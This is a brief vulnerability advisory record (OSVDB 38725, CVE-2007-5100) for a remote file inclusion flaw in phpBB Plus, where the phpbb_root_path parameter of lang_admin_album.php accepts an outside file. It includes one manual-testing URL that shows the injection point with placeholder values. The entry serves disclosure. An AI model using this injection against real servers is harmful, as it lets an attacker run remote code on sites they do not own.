phpBB Plus language/lang_english/lang_admin_album.php phpbb_root_path Variable Remote File Inclusion

2007-09-22T00:00:00
ID OSVDB:38725
Type osvdb
Reporter OSVDB
Modified 2007-09-22T00:00:00

Description

Manual Testing Notes

http://[target]/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=

References:

Vendor Specific News/Changelog Entry: http://www.phpbb2.de/ftopic45218.html Secunia Advisory ID:26888 Related OSVDB ID: 38723 Related OSVDB ID: 38724 FrSIRT Advisory: ADV-2007-3247 CVE-2007-5100 Bugtraq ID: 25776